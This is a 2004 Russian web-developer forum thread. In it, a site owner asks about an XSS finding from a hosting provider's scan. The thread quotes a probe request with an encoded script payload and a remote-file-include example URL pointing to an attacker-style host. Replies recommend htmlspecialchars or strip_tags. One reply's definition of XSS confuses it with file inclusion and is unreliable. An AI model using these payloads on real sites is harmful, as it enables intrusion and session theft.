AlieN:
мой сайт межсайтовым скриптингом.
и чем они это аргументирован?
а то мастерхост те еще прецы.
межсайтовый скриптинг (XSS)
HTTP/1.1
Описание
Возможно выполнение атаки межсайтовый скриптинг.
Запрос для выполнения атаки:
GET /search.phtml?search[price]=1&search[price_type]=1&search[order]=1&search[order_type]=1&search[search_string]=%22%27%3Cscript%3EXSS%3C%2Fscript%3E
Результат работы
<...>
align="center" border="0">Поисковая фраза XSS"> Цена (в $)
<...>
- Название: Межсайтовый скриптинг.
Отправлено: Neter от 22 Октября 2004, 14:58:29- AlieN
[P]htmlspecialchars[/P] :)- Название: Межсайтовый скриптинг.
Отправлено: AlieN от 22 Октября 2004, 19:54:37- И все? Меня пугали комбинациями типа таких:
htmlcpecialchars(addslashes(stripslashes(add_slashes($value))));
И вообще, что это такое.....
Это же не SQL-инъекция?
Или они между собой связаны?- Название: Межсайтовый скриптинг.
Отправлено: Forza от 22 Октября 2004, 21:57:01- А можно для повышения собственной эрудиции ;) узнать, что вкладывается в понятие "межсайтовый скриптинг"?
- Название: Межсайтовый скриптинг.
Отправлено: Макс от 23 Октября 2004, 13:29:40- Межсайтовый скриптинг подразумевает использование своего сайта для взлома чужого.
Известные варианты :
- include() скрипта со своего сайта :
www.example.com/index.php?page=htttp://myhost.ru/my_script.php
- внедрение яваскрпта, который будет слать какие-то данные (идентификатор сессии например) на твой сайт- Название: Межсайтовый скриптинг.
Отправлено: AlieN от 24 Октября 2004, 16:30:47- Макс
htmlspecialchars спасает?
Или нужна более умная конструкция?- Название: Межсайтовый скриптинг.
Отправлено: Макс от 24 Октября 2004, 19:35:12- AlieN
спасет.
Можно вообще strip_tags() делать - по тегам все равно поиск вести не надо